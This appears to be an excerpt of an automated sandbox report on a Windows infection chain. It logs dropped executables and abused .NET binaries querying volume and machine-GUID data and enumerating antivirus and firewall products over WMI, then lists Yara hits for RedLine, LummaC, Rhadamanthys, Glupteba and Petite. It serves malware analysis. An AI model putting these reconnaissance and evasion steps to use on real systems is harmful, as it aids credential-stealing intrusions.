Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3613.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3FF8.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4BEF.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5A58.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\617D.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\617D.exe VolumeInformation
Source: C:\Windows\System32\dialer.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\9234.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\A203.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ABF7.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp

Code function: 24_2_00457DD8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

24_2_00457DD8

Source: C:\Users\user\AppData\Local\Temp\907.exe

Code function: 6_2_6F8DA25A GetSystemTimeAsFileTime,__aulldiv,

6_2_6F8DA25A

Source: C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp

Code function: 24_2_00454AB8 GetUserNameA,

24_2_00454AB8

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 14_2_0041C85E __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

14_2_0041C85E

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Code function: 10_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

10_2_00403532

Source: C:\Users\user\AppData\Local\Temp\907.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\9234.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\A203.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Glupteba

Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2dd0e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.36c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 6508, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 564, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 5A58.exe PID: 7380, type: MEMORYSTR

Yara detected Petite Virus

Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OI81K.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DQAC.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PTF13.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-62HR3.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L2GUL.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-ER2T6.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KOPPR.tmp, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TFV9B.tmp, type: DROPPED

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000022.00000003.2177329422.000001B8F3EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2218763067.000000001BD11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 38.0.A203.exe.480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.907.exe.4d3b620.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.907.exe.4d047f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.907.exe.4d047f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.907.exe.4d3b620.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000000.2233055154.0000000000482000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3177470933.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2623549730.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1919407201.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1919407201.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2657468716.0000000002884000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
